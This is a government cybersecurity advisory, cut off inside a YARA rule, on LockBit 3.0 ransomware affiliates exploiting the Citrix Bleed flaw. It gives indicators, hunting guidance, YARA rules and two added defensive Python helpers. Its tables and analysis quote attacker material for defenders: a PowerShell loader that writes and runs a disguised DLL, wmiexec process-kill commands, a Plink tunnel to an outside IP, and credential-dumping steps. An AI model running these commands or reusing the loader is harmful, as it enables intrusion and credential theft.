#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability

Source: US Department of Homeland Security

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.

This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966 to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organizations.

Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. The TTPs observed in LockBit ransomware attacks can vary significantly from one intrusion to the next.

Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.

CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.

The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.


For the Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

CVE-2023-4966

CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].

After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.

Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog. This critical vulnerability affects the following software versions [1]:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC and NetScaler Gateway version 12.1 (EOL)
  • NetScaler ADC 13.1FIPS before 13.1-37.163
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.

Threat Actor Activity

The malware identified in this campaign is generated by a PowerShell script (123.ps1) that concatenates two base64 strings, converts the result to bytes, and writes them to the designated file path (the base64 strings are truncated here as in the original report):

    $y = "TVqQAAMA…
    $x = "RyEHABFQ…
    $filePath = "C:\Users\Public\adobelib.dll"
    $fileBytes = [System.Convert]::FromBase64String($y + $x)
    [System.IO.File]::WriteAllBytes($filePath, $fileBytes)

The resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32:

    rundll32 C:\Users\Public\adobelib.dll,main <104 hex char key>

The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.

Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote monitoring and management (RMM) tools, Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe, and other common software tools typically associated with ransomware incidents.

INDICATORS OF COMPROMISE (IOCS)

See Table 1–Table 5 for IOCs related to LockBit 3.0 affiliate exploitation of CVE-2023-4966.

[Fidelity] Legend:

  • High = Indicator is unique or highly indicates LockBit in an environment.
  • Medium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.
  • Low = Indicates tools that are commonly used but were used by LockBit.

Low confidence indicators may not be related to ransomware.

Table 1: LockBit 3.0 Affiliate Citrix Bleed Campaign

| Indicator | Type | Fidelity | Description |
| --- | --- | --- | --- |
| 192.229.221[.]95 | IP | Low | Mag.dll calls out to this IP address. Ties back to dns0.org. Run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting. |
| 123.ps1 | PowerShell script | High | Creates and executes payload via script. |
| 193.201.9[.]224 | IP | High | FTP to Russian geolocated IP from compromised system. |
| 62.233.50[.]25 | IP | High | Russian geolocated IP from compromised system. hxxp://62.233.50[.]25/en-us/docs.html and hxxp://62.233.50[.]25/en-us/test.html |
| 51.91.79[.]17 | IP | Medium | Temp.sh IP. |
| TeamViewer | Tool (Remote Admin) | Low | |
| 70.37.82[.]20 | IP | Low | IP was seen from a known compromised account reaching out to an Atera IP address. LockBit is known to leverage remote admin tools such as Atera, AnyDesk, and TeamViewer. |
| 185.17.40[.]178 | IP | Low | TeamViewer C2; ties back to a Polish service provider, Artnet Sp. z o.o. (Polish IP address). |

Table 2: LockBit 3.0 Affiliate Citrix Bleed Campaign

| Indicator | Type | Fidelity | Description |
| --- | --- | --- | --- |
| 185.229.191[.]41 | AnyDesk usage | High | AnyDesk C2. |
| 81.19.135[.]219 | IP | High | Russian geolocated IP. hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta and hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta |
| 45.129.137[.]233 | IP | Medium | Callouts from a known compromised device beginning during the compromise window. |
| Plink.exe | Command interpreter | High | Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows. |
| AnyDeskMSI.exe | Remote admin tool | High | AnyDeskMSI.exe was installed as a service with "auto start" abilities for persistence. The config file from the image could be leveraged to find the ID and connection IP, but that file is not currently available. |
| SRUtility.exe | Splashtop utility | | SHA256: 9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a |
| Netscan.exe | Network scanning software | High | SHA256: 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 |

Table 3: LockBit 3.0 Affiliate Citrix Bleed Campaign

| Indicator | Type | Fidelity | Description |
| --- | --- | --- | --- |
| Scheduled task: MEGAMEGAcmd | Persistence | High | |
| Scheduled task: UpdateAdobeTask | Persistence | High | |
| Mag.dll | Persistence | High | Identified as running within UpdateAdobeTask. SHA256: cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63 |
| 123.ps1 | Script | High | Creates `rundll32 C:\Users\Public\adobelib.dll,main`. SHA256: ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44 |
| Adobelib.dll | Persistence | Low | C2 from adobelib.dll. |
| adobe-us-updatefiles[.]digital | Tool download | High | Used to download obfuscated toolsets. |
| 172.67.129[.]176 | Tool download | High | IP of adobe-us-updatefiles[.]digital. |
| 104.21.1[.]180 | Tool download | High | IP of adobe-us-updatefiles[.]digital. |
| `cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1` | Command | High | wmiexec.exe usage. |
| `cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1` | Command | High | wmiexec.exe usage. |
| `cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex` | Command | High | wmiexec.exe usage. |
| `cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1` | Command | High | wmiexec.exe usage. |
| `cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698618203[.]51 2>&1` | Command | High | |

The authoring organizations recommend monitoring and reviewing traffic to the 81.19.135[.]* class C network and reviewing for MSHTA being called with HTTP arguments [3].

Table 4: LockBit 3.0 Affiliate Citrix Bleed Campaign

| Indicator | Type | Fidelity | Description | Notes |
| --- | --- | --- | --- | --- |
| 81.19.135[.]219 | IP | High | Russian geolocated IP used by a user to request mshta with HTTP arguments to download a randomly named HTA file, q0X5wzzEh6P7.hta. | |
| 81.19.135[.]220 | IP | High | Russian geolocated IP, seen outbound in logs. | IP registered to a South African company. |
| 81.19.135[.]226 | IP | High | Russian geolocated IP, seen outbound in logs. | IP registered to a South African company. |

Table 5: Citrix Bleed Indicators of Compromise (IOCs)

| Type | Indicator | Description |
| --- | --- | --- |
| Filename | `c:\users\downloads\process hacker 2\peview.exe` | Process Hacker |
| Filename | `c:\users\music\process hacker 2\processhacker.exe` | Process Hacker |
| Filename | psexesvc.exe | PsExec service executable |
| Filename | `c:\perflogs\processhacker.exe` | Process Hacker |
| Filename | `c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe` | Process Hacker transferred via ScreenConnect |
| Filename | `c:\perflogs\lsass.dmp` | LSASS dump |
| Filename | `c:\users\downloads\mimikatz.exe` | Mimikatz |
| Filename | `c:\users\desktop\proc64\proc.exe` | Procdump |
| Filename | `c:\users\documents\veeam-get-creds.ps1` | Decrypt Veeam creds |
| Filename | secretsdump.py | Impacket installed on Azure VM |
| Cmdline | `secretsdump.py /@ -outputfile 1` | Impacket installed on Azure VM |
| Filename | ad.ps1 | ADRecon found in PowerShell transcripts |
| Filename | `c:\perflogs\64-bit\netscan.exe` | SoftPerfect netscan |
| Filename | tniwinagent.exe | Total Network Inventory agent |
| Filename | psexec.exe | PsExec used to deploy ScreenConnect |
| Filename | 7z.exe | Used to compress files |
| Tool | Action1 | RMM |
| Tool | Atera | RMM |
| Tool | AnyDesk | RMM |
| Tool | FixMe.IT | RMM |
| Tool | ScreenConnect | RMM |
| Tool | Splashtop | RMM |
| Tool | Zoho Assist | RMM |
| IPv4 | 101.97.36[.]61 | Zoho Assist |
| IPv4 | 168.100.9[.]137 | SSH port forwarding infrastructure |
| IPv4 | 185.20.209[.]127 | Zoho Assist |
| IPv4 | 185.230.212[.]83 | Zoho Assist |
| IPv4 | 206.188.197[.]22 | PowerShell reverse shell seen in PowerShell logging |
| IPv4 | 54.84.248[.]205 | FixMe.IT IP |
| IPv4 | 141.98.9[.]137 | Remote IP for Citrix Bleed |
| Domain | assist.zoho[.]eu | Zoho Assist |
| Filename | `c:\perflogs\1.exe` | ConnectWise renamed |
| Filename | `c:\perflogs\run.exe` | ScreenConnect pushed by PsExec |
| Filename | `c:\perflogs\64-bit\m.exe` | ConnectWise renamed |
| Filename | `c:\perflogs\64-bit\m0.exe` | ConnectWise renamed |
| Filename | `c:\perflogs\za_access_my_department.exe` | Zoho Remote Assist |
| Filename | `c:\users\music\za_access_my_department.exe` | Zoho Remote Assist |
| Filename | `c:\windows\servicehost.exe` | Plink renamed |
| Filename | `c:\windows\sysconf.bat` | Runs servicehost.exe (Plink) command |
| Filename | `c:\windows\temp\screenconnect\23.8.5.8707\files\azure.msi` | Zoho Remote Assist used to transfer data via ScreenConnect |
| Cmdline | `echo enter \| c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw` | Plink port forwarding |
| Domain | eu1-dms.zoho[.]eu | Zoho Assist |
| Domain | fixme[.]it | FixMe.IT |
| Domain | unattended.techninline[.]net | FixMe.IT |

MITRE ATT&CK Tactics and Techniques

See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 6: ATT&CK Techniques for Enterprise: Discovery

| Technique Title | ID | Use |
| --- | --- | --- |
| System Information Discovery | T1082 | Threat actors will attempt to obtain information about the operating system and hardware, including versions and patches. |

Table 7: ATT&CK Techniques for Enterprise: Credential Access

| Technique Title | ID | Use |
| --- | --- | --- |
| Modify Authentication Process: Multifactor Authentication | T1556.006 | Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access. |
| Steal Web Session Cookie | T1539 | Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens. |

DETECTION METHODS

Hunting Guidance

Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., PuTTY, rClone), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.

For IP addresses:

  • Identify if NetScaler logs the change in IP.
  • Identify if users are logging in from geolocations uncommon for your organization’s user base.
  • If logging VPN authentication, identify if users are associated with two or more public IP addresses while in a different subnet or geographically dispersed.

Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.
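The IP-address checks above can be automated over gateway logs. The following is an added example, not part of the advisory, that groups records by user and session ID, ignores internal addresses, and flags any session seen from two or more public IPs, rating it higher when the addresses fall in different /24s. The key=value log format below is a constructed simplification and is not the exact NetScaler syslog layout; the parsing regex would need adjusting for real appliance output.

```python
"""
Hunt for NetScaler Gateway sessions whose client IP changes mid-session, the
pattern the advisory's IP-address guidance describes. Added example, not part
of the advisory; the log format is a constructed, simplified key=value
approximation of NetScaler AAA/SSLVPN syslog, not the exact appliance format.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample lines. Client addresses use RFC 5737 documentation ranges
# as stand-ins for public addresses; 10.20.30.40 stands in for an internal user.
SAMPLE_LOGS = """\
2023-10-30 08:01:12 AAA LOGIN user=jdoe sessionid=0x1a2b client=203.0.113.10
2023-10-30 08:14:33 SSLVPN TCPCONNSTAT user=jdoe sessionid=0x1a2b client=203.0.113.10
2023-10-30 08:20:05 SSLVPN TCPCONNSTAT user=jdoe sessionid=0x1a2b client=198.51.100.77
2023-10-30 08:22:41 AAA LOGIN user=asmith sessionid=0x3c4d client=192.0.2.25
2023-10-30 08:30:09 SSLVPN TCPCONNSTAT user=asmith sessionid=0x3c4d client=192.0.2.26
2023-10-30 08:35:50 AAA LOGIN user=bwong sessionid=0x5e6f client=10.20.30.40
2023-10-30 08:41:17 SSLVPN TCPCONNSTAT user=bwong sessionid=0x5e6f client=203.0.113.55
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<module>\S+) (?P<event>\S+) "
    r"user=(?P<user>\S+) sessionid=(?P<sid>\S+) client=(?P<client>\S+)$"
)

# Internal ranges ignored when counting public addresses. An explicit list is
# used because the stdlib is_private flag also covers the documentation ranges.
INTERNAL_NETS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_lines(log_text: str):
    """Yield one dict per line that matches the expected layout; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_session_ip_changes(log_text: str) -> list:
    """Return one finding per (user, session) seen from two or more public IPs.

    Severity is 'high' when the addresses fall in different /24s (the
    'different subnet or geographically dispersed' case) and 'medium' when
    they share a /24, which more often reflects carrier NAT or DHCP churn.
    """
    seen = defaultdict(list)  # (user, sid) -> distinct public client IPs, in order
    for rec in parse_lines(log_text):
        if is_internal(rec["client"]):
            continue
        key = (rec["user"], rec["sid"])
        if rec["client"] not in seen[key]:
            seen[key].append(rec["client"])

    findings = []
    for (user, sid), ips in seen.items():
        if len(ips) < 2:
            continue
        subnets = {ip_network(f"{ip}/24", strict=False) for ip in ips}
        findings.append({
            "user": user,
            "sessionid": sid,
            "client_ips": ips,
            "severity": "high" if len(subnets) > 1 else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_session_ip_changes(SAMPLE_LOGS):
        print(f"[{f['severity']}] {f['user']} session {f['sessionid']}: "
              f"{' -> '.join(f['client_ips'])}")
```

Because a hijacked session reuses the victim's already-authenticated session ID, the session ID itself looks normal; the client address is the field that changes, which is why the grouping key here is (user, session) rather than user alone. Pairing these findings with the geolocation check above reduces false positives from mobile users changing networks.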

The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:

  • Search for filenames that contain tf0gYx2YI for identifying LockBit encrypted files.
  • LockBit 3.0 actors were seen using the C:\Temp directory for loading and executing files.
  • Investigate requests to the HTTP/S endpoint from the WAF.
  • Hunt for suspicious login patterns in NetScaler logs.
  • Hunt for suspicious virtual desktop agent Windows Registry keys.
  • Analyze memory core dump files.

Below are CISA-developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or for additional resources, see CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [2].

YARA Rules

CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:

  • Windows Batch file (.bat)
  • Windows Executable (.exe)
  • Windows Dynamic Link Library (.dll)
  • Python Script (.py)

    rule CISA_10478915_01 : trojan installs_other_components
    {
        meta:
            author = "CISA Code & Media Analysis"
            incident = "10478915"
            date = "2023-11-06"
            last_modified = "20231108_1500"
            actor = "n/a"
            family = "n/a"
            capabilities = "installs-other-components"
            malware_type = "trojan"
            tool_type = "information-gathering"
            description = "Detects trojan .bat samples"
            sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9"
        strings:
            $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
            $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d }
            $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
        condition:
            all of them
    }

This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named ‘z.txt’ located in the path C:\Windows\Tasks. Next, a.bat pings the loopback internet protocol (IP) address 127.0.0[.]1 three times.

The next command it runs is reg save to save the HKLM\SYSTEM registry hive into the C:\Windows\Tasks\em directory. Again, a.bat pings the loopback address 127.0.0[.]1 one time before executing another reg save command that saves the HKLM\SAM registry hive into the C:\Windows\Tasks\am directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:\Users\Public\a.png. The names of the .cab files are as follows:

  • c:\windows\tasks\em.cab
  • c:\windows\tasks\am.cab
  • c:\windows\tasks\a.cab

    import "pe"

    rule CISA_10478915_02 : trojan installs_other_components
    {
        meta:
            author = "CISA Code & Media Analysis"
            incident = "10478915"
            date = "2023-11-06"
            last_modified = "20231108_1500"
            actor = "n/a"
            family = "n/a"
            capabilities = "installs-other-components"
            malware_type = "trojan"
            tool_type = "unknown"
            description = "Detects trojan PE32 samples"
            sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
        strings:
            $s1 = { 57 72 69 74 65 46 69 6c 65 }
            $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }
            $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }
            $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }
            $s5 = { 64 65 6c 65 74 65 5b 5d }
            $s6 = { 4e 41 4e 28 49 4e 44 29 }
        condition:
            uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them
    }

This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC endpoint to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, the malware outputs the message “[*]success” in the console.

    import "pe"

    rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation
    {
        meta:
            author = "CISA Code & Media Analysis"
            incident = "10478915"
            date = "2023-11-06"
            last_modified = "20231108_1500"
            actor = "n/a"
            family = "n/a"
            capabilities = "steals-authentication-credentials"
            malware_type = "trojan"
            tool_type = "credential-exploitation"
            description = "Detects trojan DLL samples"
            sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
        strings:
            $s1 = { 64 65 6c 65 74 65 }
            $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }
            $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }
            $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }
            $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }
            $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }
        condition:
            uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of them
    }

This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:\Users\Public.

Next, a.dll loads DbgCore.dll and then uses the MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:\Windows\Tasks.

    rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
    {
        meta:
            author = "CISA Code & Media Analysis"
            incident = "10478915"
            date = "2023-11-06"
            last_modified = "20231108_1500"
            actor = "n/a"
            family = "n/a"
            capabilities = "communicates-with-c2"
            malware_type = "backdoor"
            tool_type = "remote-access"
            description = "Detects trojan python samples"
            sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
        strings:
            $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
            $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
            $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
            $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
        condition:
            all of them
    }

This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword “hashpasswd” is present. If the keyword “hashpasswd” is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.
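The CISA rules above key on raw byte sequences, which are hard to review without decoding them. The following is an added example, not part of the advisory or of CISA's tooling, that parses the `strings:` section of a YARA rule, decodes each hex string to readable text (wildcards rendered as `?`), and reports how much of each string is printable ASCII, which separates plaintext indicators such as `c:\windows\tasks\z.txt` from opcode patterns like the Mandiant rule's. RULE_01 and RULE_04 are the string sections of the published rules 01 and 04; RULE_WILDCARD is a constructed sample.

```python
"""
Decode the hex-byte strings in the CISA YARA rules above so an analyst can read
what each rule matches without a hex table. Added example, not part of the
advisory or of CISA's tooling; RULE_01 and RULE_04 below are the string
sections of the published rules, and RULE_WILDCARD is a constructed sample to
show how '??' wildcards are rendered.
"""
import re

RULE_01 = r"""
rule CISA_10478915_01 : trojan installs_other_components
{
    strings:
        $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
        $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d }
        $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
    condition:
        all of them
}
"""

RULE_04 = r"""
rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
{
    strings:
        $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
        $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
        $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
        $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
    condition:
        all of them
}
"""

# Constructed: a short opcode-style pattern with wildcards, of the kind the
# Mandiant FREEFIRE hunting rule uses.
RULE_WILDCARD = r"""
rule constructed_wildcard_sample
{
    strings:
        $op = { 72 ?? ?? ?? ?? 7E 0a 00 }
    condition:
        $op
}
"""

# Matches "$name = { ... }" inside a rule's strings section.
STRING_RE = re.compile(r"\$(?P<name>\w+)\s*=\s*\{(?P<body>[^}]*)\}")


def tokenize(body: str):
    """Yield an int per literal byte and None per '??' (or nibble) wildcard."""
    for tok in body.split():
        if "?" in tok:
            yield None
        elif re.fullmatch(r"[0-9a-fA-F]{2}", tok):
            yield int(tok, 16)
        else:
            # Jumps such as [4-6] and alternations are out of scope here.
            raise ValueError(f"unsupported hex-string token: {tok!r}")


def render(tokens) -> str:
    """Printable ASCII as-is, wildcards as '?', any other byte as a \\xNN escape."""
    out = []
    for b in tokens:
        if b is None:
            out.append("?")
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            out.append(f"\\x{b:02x}")
    return "".join(out)


def decode_hex_strings(rule_text: str) -> dict:
    """Map each $name in the rule's strings section to its decoded form."""
    return {m["name"]: render(tokenize(m["body"]))
            for m in STRING_RE.finditer(rule_text)}


def text_ratio(rule_text: str) -> dict:
    """Fraction of literal bytes that are printable ASCII, per string.
    Near 1.0 means the rule keys on plaintext (paths, commands); lower values
    mean opcode or structure patterns that decoded text will not explain."""
    ratios = {}
    for m in STRING_RE.finditer(rule_text):
        toks = [b for b in tokenize(m["body"]) if b is not None]
        printable = sum(0x20 <= b < 0x7F for b in toks)
        ratios[m["name"]] = printable / len(toks) if toks else 0.0
    return ratios


if __name__ == "__main__":
    for label, rule in (("RULE_01", RULE_01), ("RULE_04", RULE_04), ("RULE_WILDCARD", RULE_WILDCARD)):
        ratios = text_ratio(rule)
        for name, text in decode_hex_strings(rule).items():
            print(f"{label} ${name} ({ratios[name]:.0%} printable): {text}")
```

Decoding rule 04 this way shows the `kwargs.get("hashpasswd"):` and `winrm.Session basic error` strings that the paragraph above describes, and decoding rule 01 shows that it matches on the exact `reg save` and `makecab` command lines from a.bat, so a.bat variants with different paths would not trigger it.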

Open Source YARA Rule

    import "pe"

    rule M_Hunting_Backdoor_FREEFIRE
    {
        meta:
            author = "Mandiant"
            description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"
            md5 = "eb842a9509dece779d138d2e6b0f6949"
            malware_family = "FREEFIRE"
        strings:
